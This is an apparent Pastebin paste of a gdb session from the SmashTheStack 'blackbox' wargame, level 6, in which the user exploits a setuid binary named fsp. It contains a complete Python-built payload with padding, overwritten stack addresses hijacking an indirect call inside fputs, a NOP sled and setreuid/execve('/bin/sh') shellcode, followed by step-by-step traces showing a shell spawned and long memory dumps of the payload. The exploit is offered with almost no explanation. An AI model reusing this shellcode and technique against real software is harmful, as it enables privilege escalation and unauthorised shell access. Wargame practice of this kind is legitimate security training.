Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- dman79@linuxlite:~$ ssh level6@blackbox.smashthestack.org -p 2225
- level6@blackbox.smashthestack.org's password:
- __________.__ __ __________
- \______ \ | _____ ____ | | _\______ \ _______ ___
- | | _/ | \__ \ _/ ___\| |/ /| | _// _ \ \/ /
- | | \ |__/ __ \\ \___| < | | ( <_> > <
- |______ /____(____ /\___ >__|_ \|______ /\____/__/\_ \
- \/ \/ \/ \/ \/ \/
- Welcome to black
- RULES->
- ->1: NO DOSING PLEASE !!!
- ->2: NO MONKEY BUSINESS!!!
- ->3: HAVE FUN
- Admin: dusty@smashthestack.org
- irc: irc.smashthestack.org #social #blackbox #staff
- INFO:
- Levels are in the /home dir. All code goes into /tmp.
- Levels 1-8 are working. Beat level 8 and you will gain level 9 privs and win.
- Tags are in /home/tags/. You can only tag at the level you are at.
- They can be seen online at the main page, http://blackbox.smashthestack.org:85/ .
- NOTICE: Easy on the resources, 30m idle logout in place.
- Last login: Mon Dec 22 13:26:43 2014 from user-105nfo4.cable.mindspring.com
- level6@blackbox:~$ gdb fsp
- GNU gdb 6.4.90-debian
- Copyright (C) 2006 Free Software Foundation, Inc.
- GDB is free software, covered by the GNU General Public License, and you are
- welcome to change it and/or distribute copies of it under certain conditions.
- Type "show copying" to see the conditions.
- There is absolutely no warranty for GDB. Type "show warranty" for details.
- This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/libthread_db.so.1".
- (gdb) display/a $eax
- (gdb) display/a $esi
- (gdb) display/1i $eip
- (gdb) b *fputs+43
- No symbol "fputs" in current context.
- (gdb) r
- Starting program: /home/level6/fsp
- usage : /home/level6/fsp <argument>
- Program exited with code 0377.
- (gdb) b *fputs+43
- Breakpoint 1 at 0xe174cb
- (gdb) r `python -c'print "\x80"*4+"A"*24+"\xac\xd3\xff\xbf"+"B"*38+"\x01"+"C"*78+"\x5f\xd2\xff\xbf"+"\x90"*854+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
- Starting program: /home/level6/fsp `python -c'print "\x80"*4+"A"*24+"\xac\xd3\xff\xbf"+"B"*38+"\x01"+"C"*78+"\x5f\xd2\xff\xbf"+"\x90"*854+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
- Breakpoint 1 at 0x1664cb
- Breakpoint 1, 0x001664cb in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x1664cb <fputs+43>: mov (%esi),%eax
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x15
- (gdb) stepi
- 0x001664cd in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x1664cd <fputs+45>: and $0x8000,%eax
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x80808080
- (gdb) stepi
- 0x001664d2 in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x1664d2 <fputs+50>: test %ax,%ax
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x8000
- (gdb) stepi
- 0x001664d5 in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x1664d5 <fputs+53>: jne 0x16650b <fputs+107>
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x8000
- (gdb) stepi
- 0x0016650b in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x16650b <fputs+107>: cmpb $0x0,0x46(%esi)
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x8000
- (gdb) stepi
- 0x0016650f in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x16650f <fputs+111>: je 0x166584 <fputs+228>
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x8000
- (gdb) stepi
- 0x00166511 in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x166511 <fputs+113>: movsbl 0x46(%esi),%eax
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x8000
- (gdb) stepi
- 0x00166515 in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x166515 <fputs+117>: mov 0xfffffff0(%ebp),%edx
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x1
- (gdb) stepi
- 0x00166518 in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x166518 <fputs+120>: mov 0x94(%esi,%eax,1),%eax
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x1
- (gdb) stepi
- 0x0016651f in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x16651f <fputs+127>: mov %edx,0x8(%esp)
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0xbfffd25f
- (gdb) stepi
- 0x00166523 in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x166523 <fputs+131>: mov 0x8(%ebp),%edx
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0xbfffd25f
- (gdb) stepi
- 0x00166526 in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x166526 <fputs+134>: mov %esi,(%esp)
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0xbfffd25f
- (gdb) stepi
- 0x00166529 in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x166529 <fputs+137>: mov %edx,0x4(%esp)
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0xbfffd25f
- (gdb) stepi
- 0x0016652d in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x16652d <fputs+141>: call *0x1c(%eax)
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0xbfffd25f
- (gdb) stepi
- 0xbfffd3ac in ?? ()
- 3: x/i $eip 0xbfffd3ac: nop
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0xbfffd25f
- (gdb) c
- Continuing.
- level6@blackbox:/home/level6$ exit
- exit
- Program exited normally.
- (gdb) WOOHOOOO!!
- Undefined command: "WOOHOOOO". Try "help".
- (gdb) x/1000wx 0xbfffd25f
- 0xbfffd25f: Cannot access memory at address 0xbfffd25f
- (gdb) r
- Starting program: /home/level6/fsp `python -c'print "\x80"*4+"A"*24+"\xac\xd3\xff\xbf"+"B"*38+"\x01"+"C"*78+"\x5f\xd2\xff\xbf"+"\x90"*854+"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"+"\x5f\xd2\xff\xbf"'`
- Breakpoint 1 at 0x3734cb
- Breakpoint 1, 0x003734cb in fputs () from /lib/tls/libc.so.6
- 3: x/i $eip 0x3734cb <fputs+43>: mov (%esi),%eax
- 2: /a $esi = 0xbfffd25f
- 1: /a $eax = 0x15
- (gdb) x/1000wx 0xbfffd25f
- 0xbfffd25f: 0x80808080 0x41414141 0x41414141 0x41414141
- 0xbfffd26f: 0x41414141 0x41414141 0x41414141 0xbfffd3ac
- 0xbfffd27f: 0x42424242 0x42424242 0x42424242 0x42424242
- 0xbfffd28f: 0x42424242 0x42424242 0x42424242 0x42424242
- 0xbfffd29f: 0x42424242 0x43014242 0x43434343 0x43434343
- 0xbfffd2af: 0x43434343 0x43434343 0x43434343 0x43434343
- 0xbfffd2bf: 0x43434343 0x43434343 0x43434343 0x43434343
- 0xbfffd2cf: 0x43434343 0x43434343 0x43434343 0x43434343
- 0xbfffd2df: 0x43434343 0x43434343 0x43434343 0x43434343
- 0xbfffd2ef: 0x43434343 0xffd25f43 0x909090bf 0x90909090
- 0xbfffd2ff: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd30f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd31f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd32f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd33f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd34f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd35f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd36f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd37f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd38f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd39f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd3af: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd3bf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd3cf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd3df: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd3ef: 0x90909090 0x90909090 0x90909090 0x90909090
- ---Type <return> to continue, or q <return> to quit---
- 0xbfffd3ff: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd40f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd41f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd42f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd43f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd44f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd45f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd46f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd47f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd48f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd49f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd4af: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd4bf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd4cf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd4df: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd4ef: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd4ff: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd50f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd51f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd52f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd53f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd54f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd55f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd56f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd57f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd58f: 0x90909090 0x90909090 0x90909090 0x90909090
- ---Type <return> to continue, or q <return> to quit---
- 0xbfffd59f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd5af: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd5bf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd5cf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd5df: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd5ef: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd5ff: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd60f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd61f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd62f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd63f: 0x90909090 0x90909090 0x90909090 0x6a909090
- 0xbfffd64f: 0xcd995831 0x89c38980 0x58466ac1 0x0bb080cd
- 0xbfffd65f: 0x2f6e6852 0x2f686873 0x8969622f 0xcdd189e3
- 0xbfffd66f: 0xffd25f80 0xffd600bf 0xffd6d8bf 0x331ea8bf
- 0xbfffd67f: 0x00000000 0x4c9cc000 0xffd6d800 0x331ea8bf
- 0xbfffd68f: 0x00000200 0xffd70400 0xffd710bf 0x000000bf
- 0xbfffd69f: 0x44aff400 0x00000000 0x4c9cc000 0xffd6d800
- 0xbfffd6af: 0xffd690bf 0x331e6dbf 0x00000000 0x00000000
- 0xbfffd6bf: 0x00000000 0x4bf09000 0x331ded00 0x4c9ff400
- 0xbfffd6cf: 0x00000200 0x0483a000 0x00000008 0x0483c100
- 0xbfffd6df: 0x04844408 0x00000208 0xffd70400 0x048560bf
- 0xbfffd6ef: 0x04851008 0x4bfc4008 0xffd6fc00 0x4ca4e4bf
- 0xbfffd6ff: 0x00000200 0xffd80f00 0xffd820bf 0x000000bf
- 0xbfffd70f: 0xffdc3600 0xffdc46bf 0xffdc51bf 0xffdc70bf
- 0xbfffd71f: 0xffdc83bf 0xffdc8fbf 0xffdf0abf 0xffdf15bf
- 0xbfffd72f: 0xffdf42bf 0xffdf58bf 0xffdf67bf 0xffdf78bf
- ---Type <return> to continue, or q <return> to quit---
- 0xbfffd73f: 0xffdf89bf 0xffdf92bf 0xffdfa4bf 0xffdfacbf
- 0xbfffd74f: 0xffdfbbbf 0x000000bf 0x00001000 0xebfbff00
- 0xbfffd75f: 0x000006bf 0x00100000 0x00001100 0x00006400
- 0xbfffd76f: 0x00000300 0x04803400 0x00000408 0x00002000
- 0xbfffd77f: 0x00000500 0x00000700 0x00000700 0x4b400000
- 0xbfffd78f: 0x00000800 0x00000000 0x00000900 0x0483a000
- 0xbfffd79f: 0x00000b08 0x0003ee00 0x00000c00 0x0003ee00
- 0xbfffd7af: 0x00000d00 0x0003ed00 0x00000e00 0x0003ed00
- 0xbfffd7bf: 0x00001700 0x00000000 0x00001900 0xffd7eb00
- 0xbfffd7cf: 0x00000fbf 0xffd7fb00 0x000000bf 0x00000000
- 0xbfffd7df: 0x00000000 0x00000000 0x00000000 0x1c259270
- 0xbfffd7ef: 0xf22aa222 0x6256d5a0 0x7d008572 0x36383669
- 0xbfffd7ff: 0x00000000 0x00000000 0x00000000 0x00000000
- 0xbfffd80f: 0x6d6f682f 0x656c2f65 0x366c6576 0x7073662f
- 0xbfffd81f: 0x80808000 0x41414180 0x41414141 0x41414141
- 0xbfffd82f: 0x41414141 0x41414141 0x41414141 0xffd3ac41
- 0xbfffd83f: 0x424242bf 0x42424242 0x42424242 0x42424242
- 0xbfffd84f: 0x42424242 0x42424242 0x42424242 0x42424242
- 0xbfffd85f: 0x42424242 0x01424242 0x43434343 0x43434343
- 0xbfffd86f: 0x43434343 0x43434343 0x43434343 0x43434343
- 0xbfffd87f: 0x43434343 0x43434343 0x43434343 0x43434343
- 0xbfffd88f: 0x43434343 0x43434343 0x43434343 0x43434343
- 0xbfffd89f: 0x43434343 0x43434343 0x43434343 0x43434343
- 0xbfffd8af: 0x43434343 0xd25f4343 0x9090bfff 0x90909090
- 0xbfffd8bf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd8cf: 0x90909090 0x90909090 0x90909090 0x90909090
- ---Type <return> to continue, or q <return> to quit---
- 0xbfffd8df: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd8ef: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd8ff: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd90f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd91f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd92f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd93f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd94f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd95f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd96f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd97f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd98f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd99f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd9af: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd9bf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd9cf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd9df: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd9ef: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffd9ff: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffda0f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffda1f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffda2f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffda3f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffda4f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffda5f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffda6f: 0x90909090 0x90909090 0x90909090 0x90909090
- ---Type <return> to continue, or q <return> to quit---
- 0xbfffda7f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffda8f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffda9f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdaaf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdabf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdacf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdadf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdaef: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdaff: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb0f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb1f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb2f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb3f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb4f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb5f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb6f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb7f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb8f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdb9f: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdbaf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdbbf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdbcf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdbdf: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdbef: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdbff: 0x90909090 0x90909090 0x90909090 0x90909090
- 0xbfffdc0f: 0x9958316a 0xc38980cd 0x466ac189 0xb080cd58
- ---Type <return> to continue, or q <return> to quit---
- 0xbfffdc1f: 0x6e68520b 0x6868732f 0x69622f2f 0xd189e389
- 0xbfffdc2f: 0xd25f80cd 0x5300bfff 0x4c4c4548 0x69622f3d
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement